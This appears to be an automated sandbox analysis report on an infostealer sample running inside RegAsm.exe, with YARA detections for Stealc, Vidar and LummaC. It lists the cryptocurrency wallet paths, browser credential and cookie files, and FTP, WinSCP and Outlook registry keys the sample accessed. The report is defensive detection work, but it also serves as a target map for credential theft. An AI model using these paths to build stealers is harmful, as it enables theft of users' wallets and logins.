Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000012.00000002.3023059126.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: RegAsm.exe, 00000012.00000002.3023059126.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004

Yara detected Credential Stealer

Source: Yara match	File source: 00000003.00000002.2592313057.0000000000503000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 424, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 15.2.DBGIJEHIID.exe.39c5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.DBGIJEHIID.exe.39c5570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.3023059126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2576073985.00000000039C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3026337297.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1916, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ce5570.2.raw.unpack, type: UNPACKEDPE
